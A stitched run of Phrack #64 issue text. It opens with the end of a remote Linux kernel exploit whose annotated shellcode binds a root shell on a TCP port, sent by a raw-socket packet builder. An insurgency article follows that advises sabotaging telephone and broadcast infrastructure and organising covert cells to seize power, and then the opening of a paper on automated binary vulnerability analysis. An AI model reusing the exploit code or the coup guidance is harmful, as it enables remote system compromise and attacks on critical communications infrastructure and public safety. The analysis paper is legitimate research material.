/* stack frame recovery step */

 "\x58"                         //  pop    %eax
 "\x83\x3c\x24\x02"             //  cmpl   $0x2,(%esp)
 "\x75\xf9"                     //  jne    8048330 <do_unroll>
 "\x83\x7c\x24\x04\x01"         //  cmpl   $0x1,0x4(%esp)
 "\x75\xf2"                     //  jne    8048330 <do_unroll>
 "\x83\x7c\x24\x10\x00"         //  cmpl   $0x0,0x10(%esp)
 "\x75\xeb"                     //  jne    8048330 <do_unroll>
 "\x8d\x64\x24\xfc"             //  lea    0xfffffffc(%esp),%esp

 "\x8b\x04\x24"                 //  mov    (%esp),%eax
 "\x89\xc3"                     //  mov    %eax,%ebx
 "\x03\x43\xfc"                 //  add    0xfffffffc(%ebx),%eax
 "\x40"                         //  inc    %eax
 "\x8a\x18"                     //  mov    (%eax),%bl
 "\x80\xfb\xc3"                 //  cmp    $0xc3,%bl
 "\x75\xf8"                     //  jne    8048351 <do_unroll+0x21>
 "\x80\x78\xff\x88"             //  cmpb   $0x88,0xffffffff(%eax)
 "\x74\xf2"                     //  je     8048351 <do_unroll+0x21>
 "\x80\x78\xff\x89"             //  cmpb   $0x89,0xffffffff(%eax)
 "\x74\xec"                     //  je     8048351 <do_unroll+0x21>
 "\x31\xc9"                     //  xor    %ecx,%ecx
 "\x48"                         //  dec    %eax
 "\x8a\x18"                     //  mov    (%eax),%bl
 "\x80\xe3\xf0"                 //  and    $0xf0,%bl
 "\x80\xfb\x50"                 //  cmp    $0x50,%bl
 "\x75\x03"                     //  jne    8048375 <do_unroll+0x45>
 "\x41"                         //  inc    %ecx
 "\xeb\xf2"                     //  jmp    8048367 <do_unroll+0x37>
 "\x40"                         //  inc    %eax
 "\x89\xc6"                     //  mov    %eax,%esi
 "\x31\xc0"                     //  xor    %eax,%eax
 "\xb0\x04"                     //  mov    $0x4,%al
 "\xf7\xe1"                     //  mul    %ecx
 "\x29\xc4"                     //  sub    %eax,%esp
 "\x31\xc0"                     //  xor    %eax,%eax
 "\xff\xe6"                     //  jmp    *%esi

/* end of stack frame recovery */

/* stage-2 shellcode */

 "\xaa"                         //  border stage-2 start

 "\xe8\x00\x00\x00\x00"         //  call   8 <func+0x8>
 "\x59"                         //  pop    %ecx
 "\x81\xe1\x00\xe0\xff\xff"     //  and    $0xffffe000,%ecx
 "\x8b\x99\xf8\x0f\x00\x00"     //  mov    0xff8(%ecx),%ebx
 "\x8b\x81\xfc\x0f\x00\x00"     //  mov    0xffc(%ecx),%eax
 "\x89\x03"                     //  mov    %eax,(%ebx)
 "\x8b\x74\x24\x38"             //  mov    0x38(%esp),%esi
 "\x89\x74\x24\x2c"             //  mov    %esi,0x2c(%esp)
 "\x31\xc0"                     //  xor    %eax,%eax
 "\xb0\x21"                     //  mov    $0x21,%al
 "\x40"                         //  inc    %eax
 "\x41"                         //  inc    %ecx
 "\x38\x01"                     //  cmp    %al,(%ecx)
 "\x75\xfb"                     //  jne    2a <func+0x2a>
 "\x41"                         //  inc    %ecx
 "\x8a\x19"                     //  mov    (%ecx),%bl
 "\x88\x1e"                     //  mov    %bl,(%esi)
 "\x41"                         //  inc    %ecx
 "\x46"                         //  inc    %esi
 "\x38\x01"                     //  cmp    %al,(%ecx)
 "\x75\xf6"                     //  jne    30 <func+0x30>
 "\xc3"                         //  ret

 "\x22"                         //  border stage-3 start

 "\x31\xdb"                     //  xor    ebx, ebx
 "\xf7\xe3"                     //  mul    ebx
 "\xb0\x66"                     //  mov     al, 102
 "\x53"                         //  push    ebx
 "\x43"                         //  inc     ebx
 "\x53"                         //  push    ebx
 "\x43"                         //  inc     ebx
 "\x53"                         //  push    ebx
 "\x89\xe1"                     //  mov     ecx, esp
 "\x4b"                         //  dec     ebx
 "\xcd\x80"                     //  int     80h
 "\x89\xc7"                     //  mov     edi, eax
 "\x52"                         //  push    edx
 "\x66\x68\x4e\x20"             //  push    word 8270
 "\x43"                         //  inc     ebx
 "\x66\x53"                     //  push    bx
 "\x89\xe1"                     //  mov     ecx, esp
 "\xb0\xef"                     //  mov    al, 239
 "\xf6\xd0"                     //  not    al
 "\x50"                         //  push    eax
 "\x51"                         //  push    ecx
 "\x57"                         //  push    edi
 "\x89\xe1"                     //  mov     ecx, esp
 "\xb0\x66"                     //  mov     al, 102
 "\xcd\x80"                     //  int     80h
 "\xb0\x66"                     //  mov     al, 102
 "\x43"                         //  inc    ebx
 "\x43"                         //  inc    ebx
 "\xcd\x80"                     //  int     80h
 "\x50"                         //  push    eax
 "\x50"                         //  push    eax
 "\x57"                         //  push    edi
 "\x89\xe1"                     //  mov    ecx, esp
 "\x43"                         //  inc    ebx
 "\xb0\x66"                     //  mov    al, 102
 "\xcd\x80"                     //  int    80h
 "\x89\xd9"                     //  mov    ecx, ebx
 "\x89\xc3"                     //  mov     ebx, eax
 "\xb0\x3f"                     //  mov     al, 63
 "\x49"                         //  dec     ecx
 "\xcd\x80"                     //  int     80h
 "\x41"                         //  inc     ecx
 "\xe2\xf8"                     //  loop    lp
 "\x51"                         //  push    ecx
 "\x68\x6e\x2f\x73\x68"         //  push    dword 68732f6eh
 "\x68\x2f\x2f\x62\x69"         //  push    dword 69622f2fh
 "\x89\xe3"                     //  mov     ebx, esp
 "\x51"                         //  push    ecx
 "\x53"                         //  push    ebx
 "\x89\xe1"                     //  mov    ecx, esp
 "\xb0\xf4"                     //  mov    al, 244
 "\xf6\xd0"                     //  not    al
 "\xcd\x80"                     //  int     80h

 "\x22"                         //  border stage-3 end

 "\xbb";                        //  border stage-2 end

/* end of shellcode */

struct twsk_chunk
  int type;
  char buff[12];

struct twsk
  int chunk_num;
  struct twsk_chunk chunk[0];

void fatal_perror(const char *issue)

void fatal(const char *issue)

/* packet IP cheksum */
unsigned short csum(unsigned short *buf, int nwords)
        unsigned long sum;
        for(sum=0; nwords>0; nwords--)
                sum += *buf++;
        sum = (sum >> 16) + (sum &0xffff);
        sum += (sum >> 16);
        return ~sum;

void prepare_packet(char *buffer)
  unsigned char *ptr = (unsigned char *)buffer;;
  unsigned int i;
  unsigned int left;

  left = TWSK_PACKET_LEN - sizeof(struct twsk) - sizeof(struct iphdr);
  left -= SIZE_JMP;
  left -= sizeof(shellcode)-1;

  ptr += (sizeof(struct twsk)+sizeof(struct iphdr));

  memset(ptr, 0x00, TWSK_PACKET_LEN);
  memcpy(ptr, shellcode, sizeof(shellcode)-1); /* shellcode must be 4
bytes aligned */

  ptr += sizeof(shellcode)-1;

  for(i=1; i < left/4; i++, ptr+=4)
        *((unsigned int *)ptr) = DEFAULT_VSYSCALL_RET;

  *((unsigned int *)ptr) = DEFAULT_VSYSCALL_JMP;

  printf("buffer=%p, ptr=%p\n", buffer, ptr);
  strcpy(ptr, JMP); /* jmp -500 */


int main(int argc, char *argv[])
        int sock;
        struct sockaddr_in sin;
        int one = 1;
        const int *val = &one;

        printf("shellcode size: %d\n", sizeof(shellcode)-1);

        char *buffer = malloc(TWSK_PACKET_LEN);


        struct iphdr *ip = (struct iphdr *) buffer;
        struct twsk *twsk = (struct twsk *) (buffer + sizeof(struct

        if(argc < 2)
          printf("Usage: ./sendtwsk ip");

        sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (sock < 0)

        sin.sin_family = AF_INET;
        sin.sin_port = htons(12345);
        sin.sin_addr.s_addr = inet_addr(argv[1]);

        /* ip packet */
        ip->ihl = 5;
        ip->version = 4;
        ip->tos = 16;
        ip->tot_len = TWSK_PACKET_LEN;
        ip->id = htons(12345);
        ip->ttl = 64;
        ip->protocol = TWSK_PROTO;
        ip->saddr = inet_addr("");
        ip->daddr = inet_addr(argv[1]);
        twsk->chunk_num = NEGATIVE_CHUNK_NUM;
        ip->check = csum((unsigned short *) buffer, TWSK_PACKET_LEN);

        if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, val, sizeof(one)) < 0)

        if (sendto(sock, buffer, ip->tot_len, 0, (struct sockaddr *) &sin,
sizeof(sin)) < 0)

        return 0;

< / >

------[ 4 - Final words 

With the remote exploiting discussion ends that paper. We have presented
different scenarios and different exploiting tecniques and 'notes' that we
hope you'll find somehow useful. This paper was a sort of sum up of the
more general approaches we took in those years of 'kernel exploiting'. 

As we said at the start of the paper, the kernel is a big and large beast,
which offers many different points of 'attack' and which has more severe
constraints than the userland exploiting. It is also 'relative new' and
improvements (and new logical or not bugs) are getting out. 
At the same time new countermeasures come out to make our 'exploiting
life' harder and harder. 

The first draft of this paper was done some months ago, so we apologies if
some of the information here present could be outdated (or already
presented somewhere else and not properly referenced). We've tried to add
a couple of comments around the text to point out the most important
recent changes.  

So, this is the end, time remains just for some greets. Thank you for
reading so far, we hope you enjoyed the whole work. 

A last minute shotout goes to bitsec guys, who performed a cool talk 
about kernel exploiting at BlackHat conference [24]. Go check their
paper/exploits for examples and covering of *BSD and Windows systems.

Greetz and thanks go, in random order, to :  

sgrakkyu: darklady(:*), HTB, risk (Arxlab), recidjvo (for netfilter
tricks), vecna (for being vecna:)).

twiz: lmbdwr, ga, sd, karl, cmn, christer, koba, smaster, #dnerds & 
#elfdev people for discussions, corrections, feedbacks and just long
'evening/late night' talks.
A last shotout to akira, sanka, metal_militia and yhly for making the
monday evening a _great_ evening [and for all the beers offered :-) ]. 

------[ 5 - References

[1] - Intel Architecture Reference Manuals

[2] - SPARC V9 Architecture

[3] - AMD64 Reference Manuals

[4] - MCAST_MSFILTER iSEC's advisory

[5] - sendmsg local buffer overflow

[6] - kad, "Handling Interrupt Descriptor Table for fun and profit" 

[7] - iSEC Security Research

[8] - Jeff Bonwick, "The Slab Allocator: An Object-Caching Kernel Memory

[9] - Daniel P. Bovet & Marco Cesati
      "Understanding the Linux Kernel", 3rd Edition [ISBN 0-596-00565-2]

[10] - Richard McDougall and Jim Mauro
       "Solaris Internals" , 2nd Edition [ISBN 0-13-148209-2]

[11] - Mel Gorman, "Linux VM Documentation"

[12] - sd, krad exploit for sys_epoll vulnerability

[13] - noir, "Smashing The Kernel Stack For Fun And Profit"

[14] - UltraSPARC User's Manuals

[15] - pr1, "Exploiting SPARC Buffer Overflow vulnerabilities"

[16] - horizon, Defeating Solaris/SPARC Non-Executable Stack Protection

[17] - Gavin Maltby's Sun Weblog, "SPARC System Calls"

[18] - PaX project 	    

[19] - Solar Designer, "Getting around non-executable stack (and fix)"

[20] - Sebastian Krahmer, "x86-64 buffer overflow exploits and the
       borrowed code chunks exploitation technique" 

[21] - Laurent BUTTI, Jerome RAZNIEWSKI & Julien TINNES
       "Madwifi SIOCGIWSCAN buffer overflow"

[22] - sgrakkyu, "madwifi linux remote kernel exploit"

[23] - sd & devik, "Linux on-the-fly kernel patching without LKM"

[24] - Joel Eriksson, Karl Janmar & Christer berg, "Kernel Wars"

------[ 6 - Sources - drivers and exploits [stuff.tgz]

begin 644 stuff.tgz


              _                                                _
            _/B\_                                            _/W\_
            (* *)             Phrack #64 file 7              (* *)
            | - |                                            | - |
            |   |     The Revolution will be on YouTube      |   |
            |   |                                            |   |
            |   |                 By Gladio                  |   |
            |   |                                            |   |
            |   |                 |   |

Forget everything you know about revolutions. It's all wrong.

Fighting a conventional war in an industrialized nation is suicide. Even
if you could field a military force capable of defeating the government
forces, the wreckage wouldn't be worth having. Think about mortar shells
landing in chemical plants. Massive toxic waste spills. Poisonous clouds
drifting with the winds. Fighting a war in your own backyard is just
plain stupid. Notice how the super-powers fight each other with proxy
wars in other countries.

Sure it might be fun to form a militia and go play army with your friends
in Idaho. Got some full-auto assault rifles?  Maybe even mortars, heavy
machine guns and some anti-aircraft guns?

Think they can take out an AC-130 lobbing artillery shells from 12 miles
away? A flight of A-10s spitting depleted uranium shells the size of your
fist at a rate that makes the cannon sound like a redlined dirt bike? A
shooting war with a modern government is a shortcut to obliteration.

Most coups are accomplished (or thwarted) by skillful manipulation of
information. There have been a number of countries where tyrants (and
legitimate leaders) have been overthrown by very small groups using mass
communications effectively.

The typical method involves blocking all (or most) information sources
controlled by the government, and supplying an alternative that delivers
your message. Usually, you just announce the change in government, tell
everyone they are safe and impose a curfew for a short time to consolidate
your control. Announce that the country, the police and the military are
under your control, and keep repeating it. Saturate the airwaves with your
message, while preventing any contradictory messages from propagation.

Virtually all broadcast media use the telephone network to deliver content
from their studios to their transmitters.  Networks use satellites and
pstn to distribute content to local stations, which then use pstn to
deliver it to the transmitter site.

Hijacking these phone connections accomplishes both goals, of denying the
'official' media access, and putting your own message out.

In cases where you can't hijack the transmitters, dropping the pstn
will be effective. Police and military also use pstn to connect dispatch
centers with transmitter towers. Recently, many have installed wireless
(microwave) fallback systems.

Physically shutting down the pstn just prior to your broadcasts may be
very effective. This is most easily accomplished by physical damage to
the telco facilities, but there are also non-physical technical means to
do this on a broad scale.  Spelling them out here would only result in the
holes being closed, but if you have people with the skill set to do this,
it is preferable to physical means because you will have the advantage
of utilizing these communications resources as your plan progresses.

Leveraging the Internet

Most of the FUD produced about insurgence and the internet is focused on
"taking down" the internet. That's probably not the most effective use
of technical assets. An insurgency would benefit more from utilizing the
net. One use is mass communications. Get your message out to the masses
and recruit new members.

Another use is for communications within your group. This is where things
get sticky. Most governments have the ability to monitor and intercept
their citizen's internet traffic. The governments most deserving of
being overthrown are probably also the most effective at electronic

The gov will also infiltrate your group, so forums aren't going to
be the best means of communicating strategies and tactics. Forums can
be useful for broad discussions, such as mission statements, goals and
recruiting. Be wary of traffic analysis and sniffing. TOR can be useful,
particularly if your server is accessible only on TOR network.

Encryption is your best friend, but can also be your worst enemy. Keep
in mind that encryption only buys you time. A good, solid cipher will
not likely be read in real time by your opponent, but will eventually
be cracked. The important factor here is that it not be cracked until
it's too late to be useful.

A one time pad (OTP) is the best way to go. Generate random data and
write it to 2, and only 2, DVDs. Physically transport the DVDs to each
communications endpoint. Never let them out of your direct control. Do
not mail them. Do not send keys over ssh or ssl. Physically hand the DVD
to your counterpart on the other end. Never re-use a portion of the key.

Below is a good way to utilize your OTP:

Generate a good OTP (K), come up with a suspicious alternate message
(M), and knowing your secret text (P), you calculate (where "+" = mod
26 addition):

K' = M + K 
K'' = P + K 
C = K' + P

Lock up K'' in a safety deposit box, and hide k' in some other off
site, secure location. Keep C around with big "beware of Crypto systems"
signs. When the rubber hose is broken out, take at least 2 good lickings,
and then give up the key to the safety deposit box. They get K'',
and calculate

K'' + C = M

thus giving them the bogus message, and protecting your real text.

Operational Security

The classic "cellular" configuration is the most secure against
infiltration and compromise. A typical cell should have no more than 5-10
members. One leader, 2 members who each know how to contact one member
of an 'upstream' cell, and 2 members who each know how to contact one
member of a downstream cell. Nobody, including the leader, should know
how to contact more than one person outside of their own cell.

Never use your real name, and never use your organizational alias in
any other context.

Electronic communications between members should be kept to a
minimum. When it is necessary, it should only be conducted via the OTP
cipher. Preferably, these communications should consist of not much more
than arranging a physical meeting.  Meet at a pre-arranged place, and
then go to another, un-announced place where surveillance is difficult,
to discuss operational matters.

Do not carry a phone. Even a phone which is switched off can be
tracked, and most can be used to eavesdrop on discussions even when
powered down. Removing the battery is only marginally safer, because
tracking/listening gear can be built into the battery pack. If you find
yourself stuck with a phone during a meeting, remove the battery and
place both the phone and battery in a metal box and remove it from the
immediate area of conversation.

It never hurts to generate some bogus traffic. Gibberish, random data,
innocuous stories etc., all serve to generate noise in which to better
hide your real communications.

Steganography can be useful when combined with solid crypto. Encrypt and
stego small messages into something like a full length movie avi, and
distribute it to many people via a torrent. Only your intended recipient
will have the key to decrypt the stegged message. Be sure to stego some
purely random noise into other movies, and torrent them as well.

Hopefully you'll find this document useful as a starting point for
further discussion and refinement. It's not meant to be definitive, and
is surely not comprehensive. Feel free to copy, add, edit or change as
you see fit. Please do add more relative to your area(s) of expertise.


		  Automated vulnerability auditing in machine code

             		Tyler Durden <> 

		              Phrack Magazine #64
		             Version of May 22 2007


I. Introduction
   a/ On the need of auditing automatically
   b/ What are exploitation frameworks
   c/ Why this is not an exploitation framework
   d/ Why this is not fuzzing
   e/ Machine code auditing : really harder than sources ? 

II. Preparation
   a/ A first intuition 
   b/ Static analysis vs dynamic analysis
   c/ Dependences & predicates
       - Controlflow analysis
       - Dataflow analysis
   d/ Translation to intermediate forms
   e/ Induction variables (variables in loops)     

III. Analysis
   a/ What is a vulnerability ?
   b/ Buffer overflows and numerical intervals
	- Flow-insensitive
	- Flow-sensitive
	- Accelerating the analysis by widening
   c/ Type-state checking
	- Memory leaks
	- Heap corruptions	
   d/ More problems
	- Predicate analysis
	- Alias analysis and naive solutions
	- Hints on detecting race conditions

IV. Chevarista: an analyzer of binary programs
   a/ Project modelization
   b/ Program transformation
   c/ Vulnerability checking
   d/ Vulnerable paths extraction
   e/ Future work : Refinement

V. Related Work
   a/ Model Checking
   b/ Abstract Interpretation

VI. Conclusion
VII. Greetings
VIII. References
IX. The code


Software have bugs. That is quite a known fact.

----------------------[ I. Introduction

In this article, we will discuss the design of an engine for automated 
vulnerability analysis of binary programs. The source code of the 
Chevarista static analyzer is given at the end of this document.

The purpose of this paper is not to disclose 0day vulnerability, but
to understand how it is possible to find them without (or with
restricted) human intervention. However, we will not friendly provide
the result of our automated auditing on predefined binaries : instead
we will always take generic examples of the most common difficulties 
encountered when auditing such programs. Our goal is to enlight the 
underground community about writing your own static analyzer and not
to be profitful for security companies or any profit oriented organization.

Instead of going straight to the results of the proposed implementation, 
we may introduce the domain of program analysis, without going deeply
in the theory (which can go very formal), but taking the perspective
of a hacker who is tired of focusing on a specific exploit problem
and want to investigate until which automatic extend it is possible
to find vulnerabilities and generate an exploit code for it without
human intervention.

Chevarista hasnt reached its goal of being this completely automated
tool, however it shows the path to implement incrementally such tool
with a genericity that makes it capable of finding any definable kind 
of vulnerability.

Detecting all the vulnerabilities of a given program can be
untractable, and this for many reasons. The first reason is that
we cannot predict that a program running forever will ever have
a bug or not. The second reason is that if this program ever stop,
the number of states (as in "memory contexts") it reached and passed
through before stopping is very big, and testing all of of possible
concrete program paths would either take your whole life, or a dedicated 
big cluster of machine working on this for you during ages.

As we need more automated systems to find bugs for us, and we do not
have such computational power, we need to be clever on what has to be 
analysed, how generic can we reason about programs, so a single small 
analyzer can reason about a lot of different kinds of bugs. After all, 
if the effort is not worth the genericity, its probably better to audit 
code manually which would be more productive. However, automated systems
are not limited to vulnerability findings, but because of their tight 
relation with the analyzed program, they can find the exact conditions 
in which that bug happens, and what is the context to reach for triggering it.

But someone could interject me : "But is not Fuzzing supposed to do
that already ?". My answer would be : Yes. But static analysis is
the intelligence inside Fuzzing. Fuzzy testing programs give very
good results but any good fuzzer need to be designed with major static
analysis orientations. This article also applies somewhat to fuzzing
but the proposed implementation of the Chevarista analyzer is not 
a fuzzer. The first reason is that Chevarista does not execute the
program for analyzing it. Instead, it acts like a (de)compiler but 
perform analysis instead of translating (back) to assembly (or source) code.
It is thus much more performant than fuzzing but require a lot of
development and litterature review for managing to have a complete
automatic tool that every hacker dream to maintain.

Another lost guy will support : "Your stuff looks more or less like an
exploitation framework, its not so new". Exploitation frameworks
are indeed not very new stuffs. None of them analyze for vulnerabilities,
and actually only works if the builtin exploits are good enough. When
the framework aims at letting you trigger exploits manually, then it
is not an automated framework anymore. This is why Chevarista is not
CORE-Impact or Metasploit : its an analyzer that find bugs in programs
and tell you where they are.

One more fat guy in the end of the room will be threatening: "It is simply
not possible to find vulnerabilities in code without the source .." and
then a lot of people will stand up and declare this as a prophety, 
because its already sufficiently hard to do it on source code anyway.
I would simply measure this judgement by several remarks: for some
peoples, assembly code -is- source code, thus having the assembly is
like having the source, without a certain number of information. That
is this amount of lost information that we need to recover when writing
a decompiler. 

First, we do not have the name of variables, but naming variables in a different
way does not affect the result of a vulnerability analysis. Second, we do not have
the types, but data types in compiled C programs do not really enforce properties 
about the variables values (because of C casts or a compiler lacking strong type 
checking). The only real information that is enforced is about variable size in
memory, which is recoverable from an assembly program most of the time. This
is not as true for C++ programs (or other programs written in higher level
objects-oriented or functional languages), but in this article we will 
mostly focuss on compiled C programs.

A widely spread opinion about program analysis is that its harder to 
acheive on a low-level (imperative) language rather than a high-level 
(imperative) language. This is true and false, we need to bring more 
precision about this statement. Specifically, we want to compare the
analysis of C code and the analysis of assembly code:

| Available information   |      C code         |    Assembly code    |
| Original variables names|    Yes (explicit)   |         No          |
|   Original types names  |    Yes (explicit)   |         No          |
|  Control Sequentiality  |    Yes (explicit)   |    Yes (explicit)   |
|  Structured control     |    Yes (explicit)   |    Yes (recoverable)|
|    Data dependencies    |    Yes (implicit)   |    Yes (implicit)   |
|    Data Types           |    Yes (explicit)   |    Yes (recoverable)|
|    Register transfers   |    No               |    Yes (explicit)   |
|  Selected instructions  |    No               |    Yes (explicit)   |

Lets discuss those points more in details:

 - The control sequentiality is obviously kept in the assembly, else
the processor would not know how to execute the binary program.
However the binary program does not contain a clearly structured
tree of execution. Conditionals, but especially, Loops, do not appear
as such in the executable code. We need a preliminary analysis for
structuring the control flow graph. This was done already on source
and binary code using different algorithms that we do not present
in this article.

- Data dependencies are not explicit even in the source program, however
we can compute it precisely both in the source code and the binary code.
The dataflow analysis in the binary code however is slightly different,
because it contains every single load and store between registers and
the memory, not only at the level of variables, as done in the source
program. Because of this, the assembly programs contains more instructions
than source programs contain statements. This is an advantage and a
disadvantage at the same time. It is an advantage because we can track
the flow in a much more fine-grained fashion at the machine level, and
that is what is necessary especially for all kind of optimizations, 
or machine-specific bugs that relies on a certain variable being either
in the memory or in a register, etc. This is a disadvantage because we 
need more memory to analyse such bigger program listings.

- Data types are explicit in the source program. Probably the recovery
of types is the hardest information to recover from a binary code. 
However this has been done already and the approach we present in this
paper is definitely compatible with existing work on type-based
decompilation. Data types are much harder to recover when dealing with
real objects (like classes in compiled C++ programs). We will not deal
with the problem of recovering object classes in this article, as we 
focuss on memory related vulnerabilities.

- Register level anomalies can happen [DLB], which can be useful for a 
hacker to determine how to create a context of registers or memory when 
writing exploits. Binary-level code analysis has this advantage that it 
provides a tighter approach to exploit generation on real world existing 

- Instruction level information is interested again to make sure we dont
miss bugs from the compiler itself. Its very academically well respected
to code a certified compiler which prove the semantic equivalence between
source code and compiled code but for the hacker point of view, it does 
not mean so much. Concrete use in the wild means concrete code,
means assembly. Additionally, it is rarer but it has been witnessed
already some irregularities in the processor's execution of specific
patterns of instructions, so an instruction level analyzer can deal with
those, but a source level analyzer cannot. A last reason I would mention
is that the source code of a project is very verbose. If a code analyzer
is embedded into some important device, either the source code of the
software inside the device will not be available, or the device will lack
storage or communication bandwidth to keep an accessible copy of the source
code. Binary code analyzer do not have this dependencie on source code and
can thus be used in a wider scope.

To sum-up, there is a lot of information recovery work before starting to
perform the source-like level analysis. However, the only information
that is not available after recovery is not mandatory for analysing
code : the name of types and variables is not affecting the 
execution of a program. We will abstract those away from our analysis
and use our own naming scheme, as presented in the next chapter of this 

-------------[ II. Preparation

We have to go on the first wishes and try to understand better what
vulnerabilities are, how we can detect them automatically, are we
really capable to generate exploits from analyzing a program that we
do not even execute ? The answer is yes and no and we need to make 
things clear about this. The answer is yes, because if you know exactly
how to caracterize a bug, and if this bug is detectable by any 
algorithm, then we can code a program that will reason only about
those known-in-advance vulnerability specificities and convert the 
raw assembly (or source) code into an intermediate form that will make
clear where the specificities happens, so that the "signature" of the
vulnerability can be found if it is present in the program. The answer
is no, because giving an unknown vulnerability, we do not know in
advance about its specificities that caracterize its signature. It
means that we somewhat have to take an approximative signature and 
check the program, but the result might be an over-approximation (a
lot of false positives) or an under-approximation (finds nothing or
few but vulnerabilities exist without being detected).

As fuzzing and black-box testing are dynamic analysis, the core of 
our analyzer is not as such, but it can find an interest to run the 
program for a different purpose than a fuzzer. Those try their 
chance on a randomly crafted input. Fuzzer does not have a *inner*
knowledge of the program they analyze. This is a major issue because
the dynamic analyzer that is a fuzzer cannot optimize or refine
its inputs depending on what are unobservable events for him. A fuzzer
can as well be coupled with a tracer [AD] or a debugger, so that fuzzing 
is guided by the debugger knowledge about internal memory states and 
variable values during the execution of the program.

Nevertheless, the real concept of a code analysis tool must be an integrated 
solution, to avoid losing even more performance when using an external 
debugger (like gdb which is awfully slow when using ptrace). Our 
technique of analysis is capable of taking decisions depending on 
internal states of a program even without executing them. However, our 
representation of a state is abstract : we do not compute the whole 
content of the real memory state at each step of execution, but consider
only the meaningful information about the behavior of the program by automatically 
letting the analyzer to annotate the code with qualifiers such as : "The next 
instruction of the will perform a memory allocation" or "Register R or memory cell 
M will contain a pointer on a dynamically allocated memory region". We will explain
in more details heap related properties checking in the type-state analysis
paragraph of Part III.

In this part of the paper, we will describe a family of intermediate forms
which bridge the gap between code analysis on a structured code, and code
analysis on an unstructured (assembly) code. Conversion to those intermediate
forms can be done from binary code (like in an analyzing decompiler) or from
source code (like in an analyzing compiler). In this article, we will
transform binary code into a program written in an intermediate form, and then
perform all the analysis on this intermediate form. All the studies properties
will be related to dataflow analysis. No structured control flow is necessary
to perform those, a simple control flow graph (or even list of basic blocks
with xrefs) can be the starting point of such analysis.

Lets be more  concrete a illustrate how we can analyze the internal states of
a program without executing it. We start with a very basic piece of code:

Stub 1:
			 o			o  : internal state
 if (a)		        / \		
   b++;		->     o   o			/\ : control-flow splitting 
 else		        \ /			\/ : control-flow merging
   c--;	               	 o

In this simplistic example, we represent the program as a graph whoose
nodes are states and edges are control flow dependencies. What is an internal
state ? If we want to use all the information of each line of code,	
we need to make it an object remembering which variables are used and modified 
(including status flags of the processors). Then, each of those control state
perform certains operations before jumping on another part of the code (represented
by the internal state for the if() or else() code stubs). Once the if/else 
code is finished, both paths merge into a unique state, which is the state after
having executed the conditional statement. Depending how abstract is the analysis,
the internal program states will track more or less requested information at each
computation step. For example, once must differentiate a control-flow analysis 
(like in the previous example), and a dataflow analysis.

Imagine this piece of code:

Stub 2:

Code			Control-flow		  Data-flow with predicates

                                                       /    \  \
                                                      /      \  \
						     /  c     \  \
c = 21;			    o		            |   o    b o  \
b = a;			    |			    |  / \    /    \ 
a = 42;			    o			     \/   ------   /
if (b != c)		   / \		             /\  |b != c| /  
  a++;			  o   o  		    /  \  ------ /
else			   \ /                     /    \ /   \ /
  a--;                      o                     |    a o   a o
c += a;                     |                      \     |    /
-------                     o                       \    |   /
			                             \   |  /
						      \	 | / 
                                                       c o 	

In a dataflow  graph, the nodes are the variables, and the arrow are the
dependences between variables. The control-flow and data-flow graphs are
actually complementary informations. One only cares about the sequentiality
in the graph, the other one care about the dependences between the variables
without apparently enforcing any order of evaluation. Adding predicates
to a dataflow graph helps at determining which nodes are involved in a
condition and which instance of the successors data nodes (in our case, 
variable a in the if() or the else()) should be considered for our 

As you can see, even a simple data-flow graph with only few variables
starts to get messy already. To clarify the reprensentation of the 
program we are working on, we need some kind of intermediate representation
that keep the sequentiality of the control-flow graph, but also provide the
dependences of the data-flow graph, so we can reason on both of them
using a single structure. We can use some kind of "program dependence graph"
that would sum it up both in a single graph. That is the graph we will consider
for the next examples of the article.

Some intermediate forms introduces special nodes in the data-flow graph, and
give a well-recognizable types to those nodes. This is the case of Phi() and
Sigma() nodes in the Static Single Assignment [SSA] and Static Single 
Information [SSI] intermediate forms and that facilitates indeed the reasoning
on the data-flow graph. Additionally, decomposing a single variable into
multiple "single assignments" (and multiple single use too, in the SSI form),
that is naming uniquely each apparition of a given variable, help at desambiguizing 
which instance of the variable we are talking about at a given point of the program:

Stub 2 in SSA form	Stub 2 in SSI form	Data-flow graph in SSI form
------------------	------------------	--------------------------

c1 = 21;		c1 = 21;			              o a1
b1 = a1;		b1 = a1;			             / \
if (b1 != c1)		(a3, a4) = Sigma(a2);  (a3, a4) = Sigma(a2) o   o b1
  a2 = a1 + 1;		if (b1 != c1)                              /|
else			  a3 = a2 + 1;                            / |
                                                                 /  | 
                                                                /   |    
                                                               /    |    o c1
  a3 = a1 - 1;		else                                   |    |    |
a4 = Phi(a2, a3)	  a4 = a2 - 1;                      a3 o    o a4 |
c2 = c1 + a4;		a5 = Phi(a3, a4);                       \   |    |
			c2 = c1 + a5;                            \  |    |
----------------        -------------------                       \ |    |
                                                                   \|    |
                                                  a5 = Phi(a3, a4)  o    |
                                                                     \  /
                                                                      o c2

Note that we have not put the predicates (condition test) in that graph. In
practice, its more convenient to have additional links in the graph, for 
predicates (that ease the testing of the predicate when walking on the graph),
but we have removed it just for clarifying what is SSA/SSI about.

Those "symbolic-choice functions" Phi() and Sigma() might sound a little bit
abstract. Indeed, they dont change the meaning of a program, but they capture
the information that a given data node has multiple successors (Sigma) or
ancestors (Phi). The curious reader is invited to look at the references for
more details about how to perform the intermediate translation. We will here 
focuss on the use of such representation, especially when analyzing code 
with loops, like this one:

		Stub 3 C code		Stub 3 in Labelled SSI form        
		-------------           ---------------------------       

		int a = 42;	        int a1 = 42;
		int i = 0;              int i1 = 0;

					P1 = [i1 < a1]
                        		(<i4:Loop>, <i9:End>) = Sigma(P1,i2);
					(<a4:Loop>, <a9:End>) = Sigma(P1,a2);
		while (i < a)           
		{                 =>    Loop:
                       			 a3 = Phi(<BLoop:a1>, <BEnd:a5>);
					 i3 = Phi(<BLoop:i1>, <BEnd:i5>);
  		  a--;                   a5 = a4 - 1;
  		  i++;                   i5 = i4 + 1;
					 P2 = [i5 < a5]
					 (<a4:Loop>, <a9:End>) = Sigma(P2,a6);
		        		 (<i4:Loop>, <i9:End>) = Sigma(P2,i6);
                        		 a8 = Phi(<BLoop:a1>, <Bend:a5>);
                        		 i8 = Phi(<BLoop:i1>, <Bend:i5>);
		a += i;                  a10 = a9 + i9;
		-----------             ---------------------------------

By trying to synthetize this form a bit more (grouping the variables
under a unique Phi() or Sigma() at merge or split points of the control
flow graph), we obtain a smaller but identical program. This time,
the Sigma and Phi functions do not take a single variable list in parameter,
but a vector of list (one list per variable):

		Stub 3 in Factored & Labelled SSI form        

		int a1 = 42;
		int i1 = 0;

		P1 = [i1 < a1]

